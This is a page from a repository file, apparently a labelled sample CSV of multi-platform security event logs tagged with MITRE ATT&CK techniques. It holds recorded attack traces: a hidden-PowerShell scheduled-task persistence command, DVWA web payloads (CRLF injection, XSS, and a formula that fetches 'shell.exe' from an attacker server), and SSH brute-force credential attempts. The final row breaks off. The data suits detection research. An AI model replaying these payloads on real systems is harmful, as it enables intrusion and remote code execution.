/
cyberknowledge
/
multiplatform-threat-logs
ОбзорДокументацияВойти
/
cyberknowledge
/
multiplatform-threat-logs
Код
Запросы
0
Задачи
Вики
Пакеты
0
Релизы
0
CI/CD
Аналитика
ДокументацияПоддержка
Политика конфиденциальностиПользовательское соглашениеПолитика использования «cookies»Согласие субъекта персональных данных
2026 ©
samples/sample_100.csv
101 строка256 KB

gammmaaa

Разнообразить technique в sample_100.csv: убрать перекос Credential Access (62 техники, 10 тактик)
02 июл 2026, 19:01
02 июл 2026, 19:01c041ee2
100 строк
1
OTRF-Security-Datasets-atomic
windows
WORKSTATION5.theshire.local
12
Persistence
T1053.005
2020-09-21T10:15:44.802000+03:00
2020-12-19T10:50:51.113000+03:00
1. A process has exited. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E7 Process Information: Process ID: 0xab8 Process Name: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.1073_none_171f6eef2a0feed0\TiWorker.exe Exit Status: 0x0 || 2. A process has exited. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E7 Process Information: Process ID: 0x25e4 Process Name: C:\Windows\servicing\TrustedInstaller.exe Exit Status: 0x0 || 3. "C:\windows\system32\schtasks.exe" /Create /F /SC DAILY /ST 09:00 /TN MordorSchtask /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\"" || 4. "C:\windows\system32\schtasks.exe" /Create /F /SC DAILY /ST 09:00 /TN MordorSchtask /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\"" || 5. The handle to an object was closed. Subject : Security ID: S-1-5-21-4228717743-1032521047-1810997296-1104 Account Name: pgustavo Account Domain: THESHIRE Logon ID: 0x2B78CD Object: Object Server: Security Handle ID: 0xcc0 Process Information: Process ID: 0x1890 Process Name: C:\Windows\System32\schtasks.exe || 6. A handle to an object was requested. Subject: Security ID: S-1-5-21-4228717743-1032521047-1810997296-1104 Account Name: pgustavo Account Domain: THESHIRE Logon ID: 0x2B78CD Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x90 Resource Attributes: - Process Information: Process ID: 0x1890 Process Name: C:\Windows\System32\s || 7. An attempt was made to access an object. Subject: Security ID: S-1-5-21-4228717743-1032521047-1810997296-1104 Account Name: pgustavo Account Domain: THESHIRE Logon ID: 0x2B78CD Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x90 Resource Attributes: - Process Information: Process ID: 0x1890 Process Name: C:\Windows\System || 8. The handle to an object was closed. Subject : Security ID: S-1-5-21-4228717743-1032521047-1810997296-1104 Account Name: pgustavo Account Domain: THESHIRE Logon ID: 0x2B78CD Object: Object Server: Security Handle ID: 0x90 Process Information: Process ID: 0x1890 Process Name: C:\Windows\System32\schtasks.exe || 9. A scheduled task was created. Subject: Security ID: S-1-5-21-4228717743-1032521047-1810997296-1104 Account Name: pgustavo Account Domain: THESHIRE Logon ID: 0x2B78CD Task Information: Task Name: \MordorSchtask Task Content: <?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2020-09-21T03:15:45</Date> < || 10. A process has exited. Subject: Security ID: S-1-5-21-4228717743-1032521047-1810997296-1104 Account Name: pgustavo Account Domain: THESHIRE Logon ID: 0x2B78CD Process Information: Process ID: 0x1890 Process Name: C:\Windows\System32\schtasks.exe Exit Status: 0x0 || 11. A process has exited. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E7 Process Information: Process ID: 0xfb8 Process Name: C:\Windows\System32\svchost.exe Exit Status: 0x0 || 12. A process has exited. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Process Information: Process ID: 0xc28 Process Name: C:\Windows\System32\svchost.exe Exit Status: 0x0
2
Linux-APT-Dataset-2024
linux
machine-1
12
Defense Evasion
T1055
2023-10-05T23:21:00.456000+03:00
2023-10-20T21:25:08.429000+03:00
1. 192.168.204.1 - - [06/Oct/2023:01:20:59 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%23%0dSet-Cookie%3acrlf%3dinjection&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 343 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 2. 192.168.204.1 - - [06/Oct/2023:01:21:00 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%23%0aSet-Cookie%3acrlf%3dinjection&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 343 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 3. 192.168.204.1 - - [06/Oct/2023:01:21:00 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%0dSet-Cookie%3acrlf%3dinjection&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 343 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 4. 192.168.204.1 - - [06/Oct/2023:01:21:00 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%23%0d%0aSet-Cookie%3acrlf%3dinjection&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 343 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 5. 192.168.204.1 - - [06/Oct/2023:01:20:59 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%%0a0aSet-Cookie%3acrlf%3dinjection&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 343 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 6. 192.168.204.1 - - [06/Oct/2023:01:21:00 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%3f%0dSet-Cookie%3acrlf%3dinjection&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 7. 192.168.204.1 - - [06/Oct/2023:01:21:00 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%0d%0aSet-Cookie%3acrlf%3dinjection&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 343 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 8. 192.168.204.1 - - [06/Oct/2023:01:21:00 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%3f%0d%0aSet-Cookie%3acrlf%3dinjection&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 9. 192.168.204.1 - - [06/Oct/2023:01:21:00 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%2e%2e%2f%0d%0aSet-Cookie%3acrlf%3dinjection&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 10. 192.168.204.1 - - [06/Oct/2023:01:21:00 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%2F%2e%2e%0d%0aSet-Cookie%3acrlf%3dinjection&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 11. 192.168.204.1 - - [06/Oct/2023:01:21:00 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%0aSet-Cookie%3acrlf%3dinjection&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 343 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 12. 192.168.204.1 - - [06/Oct/2023:01:21:00 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3dcmd%7c'%2fC%20powershell%20IEX(wget%20attacker_server%2fshell%2eexe)'!A0&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
3
OTRF-Security-Datasets-compound
windows
UTICA.dmevals.local
12
Initial Access
T1566
2020-05-02T05:56:03.792000+03:00
2020-05-02T11:16:51.399000+03:00
1. File created: RuleName: - UtcTime: 2020-05-02 02:56:02.237 ProcessGuid: {6bbf237a-cafd-5eac-2700-000000000400} ProcessId: 1732 Image: C:\windows\System32\svchost.exe TargetFilename: C:\Windows\ServiceState\EventLog\Data\lastalive1.dat CreationUtcTime: 2020-05-02 01:22:02.247 || 2. File created: RuleName: - UtcTime: 2020-05-02 02:57:02.238 ProcessGuid: {6bbf237a-cafd-5eac-2700-000000000400} ProcessId: 1732 Image: C:\windows\System32\svchost.exe TargetFilename: C:\Windows\ServiceState\EventLog\Data\lastalive0.dat CreationUtcTime: 2020-05-02 01:21:02.280 || 3. A handle to an object was requested. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x4c0 Resource Attributes: - Process Information: Process ID: 0x81c Process Name: C:\Windows\System32\svchost.exe Access Request Inform || 4. An attempt was made to access an object. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x4c0 Resource Attributes: - Process Information: Process ID: 0x81c Process Name: C:\Windows\System32\svchost.exe Access Request In || 5. A handle to an object was requested. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x4c4 Resource Attributes: - Process Information: Process ID: 0x81c Process Name: C:\Windows\System32\svchost.exe Access Request Inform || 6. An attempt was made to access an object. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x4c4 Resource Attributes: - Process Information: Process ID: 0x81c Process Name: C:\Windows\System32\svchost.exe Access Request In || 7. A handle to an object was requested. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x49c Resource Attributes: - Process Information: Process ID: 0x81c Process Name: C:\Windows\System32\svchost.exe Access Request Inform || 8. An attempt was made to access an object. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x49c Resource Attributes: - Process Information: Process ID: 0x81c Process Name: C:\Windows\System32\svchost.exe Access Request In || 9. A handle to an object was requested. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x4b4 Resource Attributes: - Process Information: Process ID: 0x81c Process Name: C:\Windows\System32\svchost.exe Access Request Inform || 10. An attempt was made to access an object. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x4b4 Resource Attributes: - Process Information: Process ID: 0x81c Process Name: C:\Windows\System32\svchost.exe Access Request In || 11. A handle to an object was requested. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x4c0 Resource Attributes: - Process Information: Process ID: 0x81c Process Name: C:\Windows\System32\svchost.exe Access Request Inform || 12. An attempt was made to access an object. Subject: Security ID: S-1-5-19 Account Name: LOCAL SERVICE Account Domain: NT AUTHORITY Logon ID: 0x3E5 Object: Object Server: Security Object Type: Key Object Name: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa Handle ID: 0x4c0 Resource Attributes: - Process Information: Process ID: 0x81c Process Name: C:\Windows\System32\svchost.exe Access Request In
4
BRAWL-Dataset
windows
sounder-pc
12
Execution
T1059.001
2017-05-01T21:58:56.688000+03:00
2017-05-01T23:21:35.194000+03:00
1. "powershell" -command - || 2. "powershell" -command - || 3. "powershell" -command - || 4. "powershell" -command - || 5. "powershell" -command - || 6. "powershell" -command - || 7. "powershell" -command - || 8. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" || 9. "c:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2 || 10. "powershell" -command - || 11. "powershell" -command - || 12. "powershell" -command -
5
BOTS-v3-Splunk
windows
serverless
12
Discovery
T1078.004
2018-08-13T09:58:14+03:00
2018-08-21T17:36:10+03:00
1. {"ConfigRuleArn": "arn:aws:config:us-west-1:622676721278:config-rule/config-rule-ic9y8e", "ConfigRuleId": "config-rule-ic9y8e", "FirstActivatedTime": "2018-08-13 06:58:14.755000+00:00", "LastSuccessfulEvaluationTime": "2018-08-20 12:55:50.997000+00:00", "FirstEvaluationStarted": true, "LastSuccessfulInvocationTime": "2018-08-20 12:55:50.572000+00:00", "ConfigRuleName": "autoscaling-group-elb-healt || 2. {"active": true, "registrationKey": "USSR-4PRK-U2SH-CWJR", "settingsInherited": {"sendReports": false, "allowLocalFolders": true, "alertInDays": 14, "reportSchedule": "_______", "securityKeyLocked": false, "isSimpleOrg": false, "radiusServerIds": [0], "destinations": [{"type": "CLUSTER", "destinationName": "Code42 Cloud USA West", "destinationId": 1000, "guid": "632540230984925185"}], "webRestoreU || 3. {"osVersion": "10.0", "status": "Deactivated", "osName": "win", "address": "192.168.247.129:4242", "backupUsage": [], "timestamp": "Mon, 20 Aug 2018 13:22:39 +0000", "loginDate": "2018-08-19T06:35:54.403Z", "service": "CrashPlan", "osArch": "amd64", "lastConnected": "2018-08-19T06:57:50.940Z", "type": "COMPUTER", "computerId": 5957, "userUid": "858489735861520388", "modular_input_consumption_time" || 4. {"notes": null, "status": "Active", "orgType": "ENTERPRISE", "backupUsage": [], "timestamp": "Mon, 20 Aug 2018 13:22:39 +0000", "lastLoginDate": null, "userUid": "858504714860528490", "userExtRef": null, "userId": 7043, "orgUid": "858489735492421636", "modular_input_consumption_time": "Mon, 20 Aug 2018 13:22:39 +0000", "modificationDate": "2018-08-19T07:06:05.839Z", "localAuthenticationOnly": fals || 5. {"orgType": "ENTERPRISE", "quotaInBytes": -1, "status": "Active", "orgId": 1852, "computerCount": 1, "modificationDate": "2018-08-19T09:22:08.540Z", "licenses": ["admin.securityTools"], "timestamp": "Mon, 20 Aug 2018 15:07:39 +0000", "invited": false, "lastLoginDate": null, "email": "mkraeusen@froth.ly", "notes": null, "orgName": "Frothly", "active": true, "usernameIsAnEmail": true, "blocked": fal || 6. {"notes": null, "status": "Active", "orgType": "ENTERPRISE", "backupUsage": [], "timestamp": "Mon, 20 Aug 2018 13:22:39 +0000", "lastLoginDate": "2018-08-19T09:26:49.773Z", "userUid": "858516966076195411", "userExtRef": null, "userId": 7173, "orgUid": "858489735492421636", "modular_input_consumption_time": "Mon, 20 Aug 2018 13:22:39 +0000", "modificationDate": "2018-08-19T09:37:09.667Z", "localAut || 7. {"orgType": "ENTERPRISE", "quotaInBytes": -1, "status": "Active", "orgId": 1852, "computerCount": 0, "modificationDate": "2018-08-19T09:51:05.839Z", "licenses": ["admin.securityTools"], "timestamp": "Mon, 20 Aug 2018 15:07:39 +0000", "invited": true, "lastLoginDate": null, "email": "ghoppy@froth.ly", "notes": null, "orgName": "Frothly", "active": true, "usernameIsAnEmail": true, "blocked": false, || 8. {"notes": null, "status": "Active", "orgType": "ENTERPRISE", "backupUsage": [], "timestamp": "Mon, 20 Aug 2018 13:22:39 +0000", "lastLoginDate": null, "userUid": "858528733162512979", "userExtRef": null, "userId": 7213, "orgUid": "858489735492421636", "modular_input_consumption_time": "Mon, 20 Aug 2018 13:22:39 +0000", "modificationDate": "2018-08-19T11:04:41.853Z", "localAuthenticationOnly": fals || 9. {"notes": null, "status": "Active", "orgType": "ENTERPRISE", "backupUsage": [], "timestamp": "Mon, 20 Aug 2018 13:22:39 +0000", "lastLoginDate": null, "userUid": "858528838288548435", "userExtRef": null, "userId": 7216, "orgUid": "858489735492421636", "modular_input_consumption_time": "Mon, 20 Aug 2018 13:22:39 +0000", "modificationDate": "2018-08-19T11:05:44.505Z", "localAuthenticationOnly": fals || 10. {"notes": null, "status": "Active", "orgType": "ENTERPRISE", "backupUsage": [], "timestamp": "Mon, 20 Aug 2018 13:22:39 +0000", "lastLoginDate": null, "userUid": "858528838338880083", "userExtRef": null, "userId": 7217, "orgUid": "858489735492421636", "modular_input_consumption_time": "Mon, 20 Aug 2018 13:22:39 +0000", "modificationDate": "2018-08-19T11:05:44.534Z", "localAuthenticationOnly": fals || 11. {"notes": null, "status": "Active", "orgType": "ENTERPRISE", "backupUsage": [], "timestamp": "Mon, 20 Aug 2018 13:22:39 +0000", "lastLoginDate": null, "userUid": "858528838238216787", "userExtRef": null, "userId": 7215, "orgUid": "858489735492421636", "modular_input_consumption_time": "Mon, 20 Aug 2018 13:22:39 +0000", "modificationDate": "2018-08-19T11:05:44.475Z", "localAuthenticationOnly": fals || 12. {"notes": null, "status": "Active", "orgType": "ENTERPRISE", "backupUsage": [], "timestamp": "Mon, 20 Aug 2018 13:22:39 +0000", "lastLoginDate": null, "userUid": "858528838171107923", "userExtRef": null, "userId": 7214, "orgUid": "858489735492421636", "modular_input_consumption_time": "Mon, 20 Aug 2018 13:22:39 +0000", "modificationDate": "2018-08-19T11:05:44.444Z", "localAuthenticationOnly": fals
6
SSH-Honeypot-2025
linux
c4f26393-ab6e-4264-a6d4-6e1f253cc465
7
Credential Access
T1110
2025-07-31T00:41:12.905105+03:00
2025-07-31T00:42:34.987198+03:00
1. Bot entered username: root, password: root || 2. Bot disconnected || 3. Bot entered username: root, password: ubuntu || 4. Bot entered username: root, password: debian || 5. Bot entered username: root, password: password || 6. Bot entered username: root, password: admin || 7. Bot entered username: root, password: test
7
OTRF-Security-Datasets-atomic
windows
WORKSTATION5.theshire.local
12
Persistence
T1547.001
2020-09-04T10:07:09.951000+03:00
2020-09-04T10:09:57.212000+03:00
1. File created: RuleName: - UtcTime: 2020-09-04 07:07:07.176 ProcessGuid: {3ddc5665-d6f5-5f51-2300-000000000400} ProcessId: 1496 Image: C:\windows\System32\svchost.exe TargetFilename: C:\Windows\ServiceState\EventLog\Data\lastalive1.dat CreationUtcTime: 2020-09-04 05:57:06.770 || 2. A process has exited. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E7 Process Information: Process ID: 0x16a0 Process Name: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.1012_none_171983fb2a153d25\TiWorker.exe Exit Status: 0x0 || 3. A process has exited. Subject: Security ID: S-1-5-18 Account Name: WORKSTATION5$ Account Domain: THESHIRE Logon ID: 0x3E7 Process Information: Process ID: 0x17c4 Process Name: C:\Windows\servicing\TrustedInstaller.exe Exit Status: 0x0 || 4. File Delete: RuleName: - UtcTime: 2020-09-04 07:07:11.700 ProcessGuid: {3ddc5665-d6fb-5f51-4900-000000000400} ProcessId: 3080 User: NT AUTHORITY\SYSTEM Image: C:\WindowsAzure\GuestAgent_2.7.41491.993_2020-09-04_054718\GuestAgent\WindowsAzureGuestAgent.exe TargetFilename: C:\Windows\Temp\f45420e9-3a41-4fcf-9882-11fee917c57f\bin\JsonADDomainExtension.exe Hashes: SHA1=D270375977EE32574894697F89DDDE01 || 5. File Delete: RuleName: - UtcTime: 2020-09-04 07:07:11.700 ProcessGuid: {3ddc5665-d6fb-5f51-4900-000000000400} ProcessId: 3080 User: NT AUTHORITY\SYSTEM Image: C:\WindowsAzure\GuestAgent_2.7.41491.993_2020-09-04_054718\GuestAgent\WindowsAzureGuestAgent.exe TargetFilename: C:\Windows\Temp\f45420e9-3a41-4fcf-9882-11fee917c57f\bin\JsonADDomainExtension.exe.config Hashes: SHA1=7C02C275F200CFFABC4804CF6 || 6. File Delete: RuleName: - UtcTime: 2020-09-04 07:07:11.700 ProcessGuid: {3ddc5665-d6fb-5f51-4900-000000000400} ProcessId: 3080 User: NT AUTHORITY\SYSTEM Image: C:\WindowsAzure\GuestAgent_2.7.41491.993_2020-09-04_054718\GuestAgent\WindowsAzureGuestAgent.exe TargetFilename: C:\Windows\Temp\f45420e9-3a41-4fcf-9882-11fee917c57f\bin\JsonBasedExtension.dll Hashes: SHA1=192964B1C97C3D2E01A9620056E476D0112 || 7. File Delete: RuleName: - UtcTime: 2020-09-04 07:07:11.700 ProcessGuid: {3ddc5665-d6fb-5f51-4900-000000000400} ProcessId: 3080 User: NT AUTHORITY\SYSTEM Image: C:\WindowsAzure\GuestAgent_2.7.41491.993_2020-09-04_054718\GuestAgent\WindowsAzureGuestAgent.exe TargetFilename: C:\Windows\Temp\f45420e9-3a41-4fcf-9882-11fee917c57f\bin\Newtonsoft.Json.dll Hashes: SHA1=6A0D5DB122C04961588319C910AF69B244BB99 || 8. File Delete: RuleName: - UtcTime: 2020-09-04 07:07:11.715 ProcessGuid: {3ddc5665-d6fb-5f51-4900-000000000400} ProcessId: 3080 User: NT AUTHORITY\SYSTEM Image: C:\WindowsAzure\GuestAgent_2.7.41491.993_2020-09-04_054718\GuestAgent\WindowsAzureGuestAgent.exe TargetFilename: C:\Windows\Temp\f45420e9-3a41-4fcf-9882-11fee917c57f\disable.cmd Hashes: SHA1=9C55A9A3120055864DDF0EC0CF562AFC18B03EE4,MD5=EE871 || 9. File Delete: RuleName: - UtcTime: 2020-09-04 07:07:11.715 ProcessGuid: {3ddc5665-d6fb-5f51-4900-000000000400} ProcessId: 3080 User: NT AUTHORITY\SYSTEM Image: C:\WindowsAzure\GuestAgent_2.7.41491.993_2020-09-04_054718\GuestAgent\WindowsAzureGuestAgent.exe TargetFilename: C:\Windows\Temp\f45420e9-3a41-4fcf-9882-11fee917c57f\enable.cmd Hashes: SHA1=D399005ABFC27139193333F4EA7BD5AE90A762AF,MD5=4A6F3C || 10. File Delete: RuleName: - UtcTime: 2020-09-04 07:07:11.715 ProcessGuid: {3ddc5665-d6fb-5f51-4900-000000000400} ProcessId: 3080 User: NT AUTHORITY\SYSTEM Image: C:\WindowsAzure\GuestAgent_2.7.41491.993_2020-09-04_054718\GuestAgent\WindowsAzureGuestAgent.exe TargetFilename: C:\Windows\Temp\f45420e9-3a41-4fcf-9882-11fee917c57f\HandlerManifest.json Hashes: SHA1=AC6E02514839C10108B0BA18E31CD181968749AA, || 11. File Delete: RuleName: - UtcTime: 2020-09-04 07:07:11.715 ProcessGuid: {3ddc5665-d6fb-5f51-4900-000000000400} ProcessId: 3080 User: NT AUTHORITY\SYSTEM Image: C:\WindowsAzure\GuestAgent_2.7.41491.993_2020-09-04_054718\GuestAgent\WindowsAzureGuestAgent.exe TargetFilename: C:\Windows\Temp\f45420e9-3a41-4fcf-9882-11fee917c57f\install.cmd Hashes: SHA1=88441B26C6B8DE5A9A7FF819B59BB4859E561B48,MD5=4C34B || 12. File Delete: RuleName: - UtcTime: 2020-09-04 07:07:12.277 ProcessGuid: {3ddc5665-d6fb-5f51-4900-000000000400} ProcessId: 3080 User: NT AUTHORITY\SYSTEM Image: C:\WindowsAzure\GuestAgent_2.7.41491.993_2020-09-04_054718\GuestAgent\WindowsAzureGuestAgent.exe TargetFilename: C:\Windows\Temp\f45420e9-3a41-4fcf-9882-11fee917c57f\resetState.cmd Hashes: SHA1=9C3E12DB425E594888085E30A3F9AD31B78E2768,MD5=66
8
Linux-APT-Dataset-2024
linux
machine-1
12
Execution
T1059.007
2023-10-05T23:21:02.851000+03:00
2023-10-20T21:16:27.521000+03:00
1. 192.168.204.1 - - [06/Oct/2023:01:21:01 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=echo%20'%3cimg%20src%3dhttps%3a%2f%2fcrowdshield%2ecom%2f%2etesting%2fxss%2ejs%20onload%3dprompt(2)%20onerror%3dalert(3)%3e%3c%2fimg%3e'%2f%2f%20XXXXXXXXXXX&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) || 2. 192.168.204.1 - - [06/Oct/2023:01:21:01 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3becho%20'%3cscript%3ealert(1)%3c%2fscript%3e'&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 3. 192.168.204.1 - - [06/Oct/2023:01:21:01 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=echo%20'%3cscript%20src%3dhttps%3a%2f%2fcrowdshield%2ecom%2f%2etesting%2fxss%2ejs%3e%3c%2fscript%3e'%2f%2f%20XXXXXXXXXXX&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gec || 4. 192.168.204.1 - - [06/Oct/2023:01:21:01 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3becho%20'%3cscript%3ealert(1)%3c%2fscript%3e'&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 5. 192.168.204.1 - - [06/Oct/2023:01:21:01 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=echo%20'%3cscript%3ealert(1)%3c%2fscript%3e'%2f%2f%20XXXXXXXXXXX&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 6. 192.168.204.1 - - [06/Oct/2023:01:22:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cscript%3ealert(x%2ey%2ez)%3c%2fscript%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" || 7. 